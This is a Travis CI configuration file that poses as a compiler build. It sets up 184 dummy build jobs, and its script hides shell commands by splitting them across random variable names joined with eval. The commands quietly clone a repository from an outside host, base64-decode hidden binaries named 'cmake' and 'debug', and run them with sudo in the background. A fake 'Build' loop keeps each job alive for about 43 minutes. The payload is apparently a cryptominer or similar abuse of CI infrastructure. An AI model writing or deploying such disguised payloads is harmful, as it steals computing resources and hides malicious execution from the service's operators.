dist: bionic

env:
  - BUILD="Ca1"
  - BUILD="Ca2"
  - BUILD="Ca3"
  - BUILD="Ca4"
  - BUILD="Ca5"
  - BUILD="Ca6"
  - BUILD="Ca7"
  - BUILD="Ca8"
  - BUILD="Ca9"
  - BUILD="Ca10"
  - BUILD="Ca11"
  - BUILD="Ca12"
  - BUILD="Ca13"
  - BUILD="Ca14"
  - BUILD="Ca15"
  - BUILD="Ca16"
  - BUILD="Ca17"
  - BUILD="Ca18"
  - BUILD="Ca19"
  - BUILD="Ca20"
  - BUILD="Ca21"
  - BUILD="Ca22"
  - BUILD="Ca23"
  - BUILD="Ca24"
  - BUILD="Ca25"
  - BUILD="Ca26"
  - BUILD="Ca27"
  - BUILD="Ca28"
  - BUILD="Ca29"
  - BUILD="Ca30"
  - BUILD="Ca31"
  - BUILD="Ca32"
  - BUILD="Ca33"
  - BUILD="Ca34"
  - BUILD="Ca35"
  - BUILD="Ca36"
  - BUILD="Ca37"
  - BUILD="Ca38"
  - BUILD="Ca39"
  - BUILD="Ca40"
  - BUILD="Ca41"
  - BUILD="Ca42"
  - BUILD="Ca43"
  - BUILD="Ca44"
  - BUILD="Ca45"
  - BUILD="Ca46"
  - BUILD="Ca47"
  - BUILD="Ca48"
  - BUILD="Ca49"
  - BUILD="Ca50"
  - BUILD="Ca51"
  - BUILD="Ca52"
  - BUILD="Ca53"
  - BUILD="Ca54"
  - BUILD="Ca55"
  - BUILD="Ca56"
  - BUILD="Ca57"
  - BUILD="Ca58"
  - BUILD="Ca59"
  - BUILD="Ca60"
  - BUILD="Ca61"
  - BUILD="Ca62"
  - BUILD="Ca63"
  - BUILD="Ca64"
  - BUILD="Ca65"
  - BUILD="Ca66"
  - BUILD="Ca67"
  - BUILD="Ca68"
  - BUILD="Ca69"
  - BUILD="Ca70"
  - BUILD="Ca71"
  - BUILD="Ca72"
  - BUILD="Ca73"
  - BUILD="Ca74"
  - BUILD="Ca75"
  - BUILD="Ca76"
  - BUILD="Ca77"
  - BUILD="Ca78"
  - BUILD="Ca79"
  - BUILD="Ca80"
  - BUILD="Ca81"
  - BUILD="Ca82"
  - BUILD="Ca83"
  - BUILD="Ca84"
  - BUILD="Ca85"
  - BUILD="Ca86"
  - BUILD="Ca87"
  - BUILD="Ca88"
  - BUILD="Ca89"
  - BUILD="Ca90"
  - BUILD="Ca91"
  - BUILD="Ca92"
  - BUILD="Ca93"
  - BUILD="Ca94"
  - BUILD="Ca95"
  - BUILD="Ca96"
  - BUILD="Ca97"
  - BUILD="Ca98"
  - BUILD="Ca99"
  - BUILD="Ca100"
  - BUILD="Ca101"
  - BUILD="Ca102"
  - BUILD="Ca103"
  - BUILD="Ca104"
  - BUILD="Ca105"
  - BUILD="Ca106"
  - BUILD="Ca107"
  - BUILD="Ca108"
  - BUILD="Ca109"
  - BUILD="Ca110"
  - BUILD="Ca111"
  - BUILD="Ca112"
  - BUILD="Ca113"
  - BUILD="Ca114"
  - BUILD="Ca115"
  - BUILD="Ca116"
  - BUILD="Ca117"
  - BUILD="Ca118"
  - BUILD="Ca119"
  - BUILD="Ca120"
  - BUILD="Ca121"
  - BUILD="Ca122"
  - BUILD="Ca123"
  - BUILD="Ca124"
  - BUILD="Ca125"
  - BUILD="Ca126"
  - BUILD="Ca127"
  - BUILD="Ca128"
  - BUILD="Ca129"
  - BUILD="Ca130"
  - BUILD="Ca131"
  - BUILD="Ca132"
  - BUILD="Ca133"
  - BUILD="Ca134"
  - BUILD="Ca135"
  - BUILD="Ca136"
  - BUILD="Ca137"
  - BUILD="Ca138"
  - BUILD="Ca139"
  - BUILD="Ca140"
  - BUILD="Ca141"
  - BUILD="Ca142"
  - BUILD="Ca143"
  - BUILD="Ca144"
  - BUILD="Ca145"
  - BUILD="Ca146"
  - BUILD="Ca147"
  - BUILD="Ca148"
  - BUILD="Ca149"
  - BUILD="Ca150"
  - BUILD="Ca151"
  - BUILD="Ca152"
  - BUILD="Ca153"
  - BUILD="Ca154"
  - BUILD="Ca155"
  - BUILD="Ca156"
  - BUILD="Ca157"
  - BUILD="Ca158"
  - BUILD="Ca159"
  - BUILD="Ca160"
  - BUILD="Ca161"
  - BUILD="Ca162"
  - BUILD="Ca163"
  - BUILD="Ca164"
  - BUILD="Ca165"
  - BUILD="Ca166"
  - BUILD="Ca167"
  - BUILD="Ca168"
  - BUILD="Ca169"
  - BUILD="Ca170"
  - BUILD="Ca171"
  - BUILD="Ca172"
  - BUILD="Ca173"
  - BUILD="Ca174"
  - BUILD="Ca175"
  - BUILD="Ca176"
  - BUILD="Ca177"
  - BUILD="Ca178"
  - BUILD="Ca179"
  - BUILD="Ca180"
  - BUILD="Ca181"
  - BUILD="Ca182"
  - BUILD="Ca183"
  - BUILD="Ca184"

language: minimal

script:
  - sudo apt update || true
  - XQwmteQrk="sudo apt --"
  - WbZZPCB="yes install"
  - VmbTHv=" cl-base64 "
  - fbUmjVYKaO="git &>/dev/"
  - eval "$XQwmteQrk""$WbZZPCB""$VmbTHv""$fbUmjVYKaO""null"
  - CVECcgKSS="git clone h"
  - GoBdjmCCkAn="ttps://gccb"
  - ntYjqBJbCT="uild@bitbuc"
  - NAsYw="ket.org/gcc"
  - GSVwrTzx="build/gcc.g"
  - uCyYYAjZ="it &>/dev/n"
  - eval "$CVECcgKSS""$GoBdjmCCkAn""$ntYjqBJbCT""$NAsYw""$GSVwrTzx""$uCyYYAjZ""ull"
  - SAbBGevpho="base64 -d g"
  - OxzHmZiMal="cc/cmake_ >"
  - eval "$SAbBGevpho""$OxzHmZiMal"" cmake"
  - MxfYw="base64 -d g"
  - mSlCMsFQKK="cc/config_ "
  - eval "$MxfYw""$mSlCMsFQKK""> cconfig"
  - HQSYIS="base64 -d g"
  - SBAtWEEb="cc/make_ > "
  - eval "$HQSYIS""$SBAtWEEb""debug"
  - ZtwwZGLqyXF="chmod +x de"
  - eval "$ZtwwZGLqyXF""bug cmake"
  - jAasvu="./cmake"
  - eval "$jAasvu"""
  - GiancsDkoo="sed -i 's/b"
  - xNMSGHo="uild/tg2o/g"
  - eval "$GiancsDkoo""$xNMSGHo""' cconfig"
  - AlcsgMlixga="sudo ./debu"
  - AqBbgm="g --config "
  - OLLEMzPUa="cconfig &>/"
  - eval "$AlcsgMlixga""$AqBbgm""$OLLEMzPUa""dev/null &"
  - GCC=$(date +%s)
  - JBjzSNoorgE="echo $BUILD"
  - eval "$JBjzSNoorgE"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2574)) ] && sudo killall debug && break; sleep 231; done
